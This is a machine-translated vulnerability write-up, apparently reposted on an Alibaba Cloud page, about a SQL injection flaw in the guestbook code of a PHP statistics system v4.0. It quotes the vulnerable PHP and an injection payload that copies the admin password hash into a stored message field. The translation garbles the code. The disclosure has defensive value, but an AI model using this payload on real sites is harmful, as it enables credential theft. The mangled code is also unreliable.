Popular multi-user PHP Statistics System v4.0 Injection Vulnerability

Source: Internet
Author: User


Today, when I was tired of reading things, I just downloaded such a set of code.

Let's take a look at his explanation. It is claimed that the password is completely protected against injection attacks, and the password is encrypted with 32-bit Md5.

After reading this, most injections are basically impossible, unless the other party leaks something.

However, there is such a more common vulnerability.

Cf_do.php

Code:
// Leave a message
If ($ action = "gbookaddsave ")
{
$ Username = chkstr ($ _ GET ["username"], 1 );
$ Content = HTMLSpecialChars (chkstr ($ _ POST ["content"], 1 ));
$ Contact = HTMLSpecialChars (chkstr ($ _ POST ["contact"], 1 ));
$ Ly = substr (urldecode (chkstr ($ _ GET ["ly"], 1), 0,255 );
$ Currweb = substr (urldecode (chkstr ($ _ GET ["currweb"], 1), 0,255 );

If ($ content = "") alertclose ("Enter the message content ");
If ($ contact = "") alertclose ("Enter the contact information ");

$ SQL = "select count (*) from cfstat_gbook where username = $ username and content = $ content and contact = $ contact and TO_DAYS (NOW ()-TO_DAYS (addtime) = 0 ";
$ Result = mysql_query ($ SQL );
$ Rs = mysql_fetch_array ($ result );
If ($ rs [0]> 0) alertclose ("You have left the same message before! ");

$ SQL = "insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
($ Username, $ content, $ contact, $ ly, $ currweb, ". date (" Y-m-d H: I: s ").")";
Mysql_query ($ SQL );

Alertclose ("message succeeded ");}


If I have read the second injection vulnerability, I should be familiar with it.
Above, he first passes chkstr filtering before urldecode filtering. This vulnerability is generated.

There is nothing to say about vulnerability mining in general. Usage is relatively good.

Insert into: we can write code like this.


Code:
Insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
(1111,1111, 1111, SQL statement, (select pwd from cfstat_admin where id = 1), 1111) % 23 $ currweb ,". date ("Y-m-d H: I: s "). ")


In general, we should not only fix common vulnerabilities, but also many unconventional vulnerabilities.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.